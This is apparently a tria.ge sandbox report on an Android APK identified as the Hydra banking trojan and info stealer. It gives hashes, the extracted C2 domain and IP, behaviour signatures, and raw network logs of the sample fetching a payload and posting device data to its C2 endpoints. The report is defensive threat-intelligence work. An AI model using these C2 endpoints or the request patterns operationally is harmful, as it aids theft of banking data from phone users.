Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

7

9c96b8f5b7...65.apk

android-9-x86

10

9c96b8f5b7...65.apk

android-10-x64

10

9c96b8f5b7...65.apk

android-11-x64

10

Analysis

  • max time kernel
    2817949s
  • max time network
    142s
  • platform
    android_x86
  • resource
    android-x86-arm-20220621-en
  • resource tags

    androidarch:armarch:x86image:android-x86-arm-20220621-enlocale:en-usos:android-9-x86system
  • submitted
    16/08/2022, 18:36 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9c96b8f5b7599b8f447d56c5e51b3e65.apk

  • Size

    2.7MB

  • MD5

    9c96b8f5b7599b8f447d56c5e51b3e65

  • SHA1

    9ea098c58e0054c4977e164c62ef9a5218fa2e1c

  • SHA256

    c87b73a7595006407d2eb454912707fa9ca4ca700a1afbea7657f7dc5f7899c6

  • SHA512

    6ffad1c6253f3bbd95a2e51dbac021f5fc4033d505685747d5836d970616fcf96601a3c59597ea4f87100293bbc6c53e3704a7f9b28da33775edf753beb6ce96

Score
10/10
hydrabankerinfostealertrojan

Malware Config

Extracted

Family

hydra

C2

https://notpro.top

Signatures

  • Hydra

    Android banker and info stealer.

    bankertrojaninfostealerhydra
  • Hydra payload 2 IoCs
  • Makes use of the framework's Accessibility service. 2 IoCs
  • Loads dropped Dex/Jar 2 IoCs

    Runs executable file dropped to the device during analysis.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Reads information about phone network operator.

Processes

  • com.lawsuit.today
    1⤵
    • Makes use of the framework's Accessibility service.
    • Loads dropped Dex/Jar
    PID:4695
    • /system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json --output-vdex-fd=41 --oat-fd=42 --oat-location=/data/user/0/com.lawsuit.today/app_DynamicOptDex/oat/x86/wdebM.odex --compiler-filter=quicken --class-loader-context=&
      2⤵
      • Loads dropped Dex/Jar
      PID:4753

Network

  • flag-us
    DNS
    semanticlocation-pa.googleapis.com
    Remote address:
    1.1.1.1:53
    Request
    semanticlocation-pa.googleapis.com
    IN A
    Response
    semanticlocation-pa.googleapis.com
    IN A
    216.58.208.106
  • flag-us
    DNS
    notpro.top
    Remote address:
    1.1.1.1:53
    Request
    notpro.top
    IN A
    Response
    notpro.top
    IN A
    185.225.73.4
  • flag-nl
    GET
    https://notpro.top/payload
    Remote address:
    185.225.73.4:443
    Request
    GET /payload HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: application/octet-stream
    Content-Length: 997816
    Connection: keep-alive
    Last-Modified: Fri, 27 May 2022 19:07:18 GMT
    ETag: "62912166-f39b8"
    Accept-Ranges: bytes
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/update
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/update HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 31
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:55 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
  • flag-nl
    GET
    https://notpro.top/api/mirrors
    Remote address:
    185.225.73.4:443
    Request
    GET /api/mirrors HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
    Content-Encoding: gzip
  • flag-nl
    POST
    https://notpro.top/api/v1/device/lock
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/lock HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 18
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip
    Remote address:
    185.225.73.4:443
    Request
    GET /storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:39:50 GMT
    Content-Type: application/zip
    Content-Length: 70907101
    Connection: keep-alive
    Last-Modified: Fri, 15 Jul 2022 17:46:01 GMT
    ETag: "62d1a7d9-439f4dd"
    Content-Range: bytes 0-70907100/70907101
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:09 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 137
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 3389
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:13 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:40:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    216.58.208.110
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json
    Remote address:
    208.95.112.1:80
    Request
    GET /json HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: ip-api.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Tue, 16 Aug 2022 18:40:10 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 302
    Access-Control-Allow-Origin: *
    X-Ttl: 54
    X-Rl: 43
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:15 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:16 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    GET
    https://notpro.top/api/v1/device/check?screen=true
    Remote address:
    185.225.73.4:443
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:55 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-nl
    POST
    https://notpro.top/api/v1/device/server-log
    Remote address:
    185.225.73.4:443
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: 962dd4ae9998bccc
    Content-Type: application/json
    charset: utf-8
    Content-Length: 112
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
    Host: notpro.top
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 16 Aug 2022 18:41:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • 142.250.179.195:443
    52 B
     40 B
     1
    1
  • 142.250.179.142:443
    tls, https
    803 B
     40 B
     1
    1
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    9.6kB
     1.0MB
     144
    232

    HTTP Request

    GET https://notpro.top/payload

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/update

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/check?screen=true
    tls, http
    1.6kB
     16.4kB
     15
    15

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    491.4kB
     72.1MB
     8990
    14113

    HTTP Request

    GET https://notpro.top/api/mirrors

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/lock

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/storage/zip/TM521X6rBCNCY1YiGIJHoc63sciAe8qn1ARJ0z8p.zip

    HTTP Response

    206

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device

    HTTP Response

    200

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 216.58.208.110:443
    android.apis.google.com
    tls
    4.4kB
     9.4kB
     13
    19
  • 208.95.112.1:80
    http://ip-api.com/json
    http
    451 B
     651 B
     5
    4

    HTTP Request

    GET http://ip-api.com/json

    HTTP Response

    200
  • 1.1.1.1:853
    tls
    776 B
     3.5kB
     10
    9
  • 1.1.1.1:853
    tls
    810 B
     4.0kB
     9
    10
  • 1.1.1.1:853
    tls
    1.2kB
     1.1kB
     10
    10
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    2.0kB
     15.5kB
     15
    15

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    1.8kB
     15.3kB
     11
    11

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 185.225.73.4:443
    https://notpro.top/api/v1/device/server-log
    tls, http
    1.9kB
     15.3kB
     12
    12

    HTTP Request

    GET https://notpro.top/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST https://notpro.top/api/v1/device/server-log

    HTTP Response

    403
  • 1.1.1.1:53
    semanticlocation-pa.googleapis.com
    dns
    80 B
     96 B
     1
    1

    DNS Request

    semanticlocation-pa.googleapis.com

    DNS Response

    216.58.208.106

  • 1.1.1.1:53
    notpro.top
    dns
    56 B
     72 B
     1
    1

    DNS Request

    notpro.top

    DNS Response

    185.225.73.4

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    216.58.208.110

  • 1.1.1.1:53
    ip-api.com
    dns
    112 B
     2

    DNS Request

    ip-api.com

    DNS Request

    ip-api.com

  • 1.1.1.1:53
    ip-api.com
    dns
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json
    Filesize

    1.3MB

    MD5

    5ebe4e294ee14d00e628510874fa1e7f

    SHA1

    cb158896516628256976957a3d252bcf6f401ad9

    SHA256

    b335647aad2246da6b67f7727d97562838a032e198271e5700651c51b9bf1b7b

    SHA512

    188238c09526b1680e375be98304b36c2f6595f8366e32b4a1a712d40f94ef270208dd84a903994f4e57bb5fa33b00114eb2ff3c72c36be0d95a54affecdd13b

    Download Submit

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json
    Filesize

    3.6MB

    MD5

    81da1d044c8d0f6158041b373b42d8cd

    SHA1

    282b8d8eba1e63d25812d6e8b99ee39b19b3444c

    SHA256

    ce8b4453c6b727780c94ebd80f90b264d819f9172f0d49c0e229a1a9f41f926e

    SHA512

    f3cd99c8824fd5f62e351bafd4fcb034d12645767bf917ba20f8858d70c75ff40fcde61b84b019a3cff829086f47aef4f2acb4c11031b6e2416100f0c901fba6

    Download Submit

  • /data/user/0/com.lawsuit.today/app_DynamicOptDex/wdebM.json
    Filesize

    3.6MB

    MD5

    bfe4abdeb63bb7ca930679be5087df29

    SHA1

    828f80c25ab12ca251642439f690aec0aad6ecc9

    SHA256

    76112405f0249e3f37b36efe9d5d20fa2b40c2fb2ba5b592e9b86d9b5dabe5f4

    SHA512

    3582139e763ea6a32ae05d30dc1e1dabd25d529aa38921306fe3fa0044a5a177e8480bfc43167fb17ca5c3a83c22fd74bb5bd6cdfe26aa2857aa8ef8eb0734a6

    Download Submit

  • /data/user/0/com.lawsuit.today/app_apk/payload.apk
    Filesize

    974KB

    MD5

    3baeaa766ea7f31a9147208efd957c75

    SHA1

    c701de3d0e55425394ccbf8e0967639e86f3c54e

    SHA256

    75e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d

    SHA512

    9f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.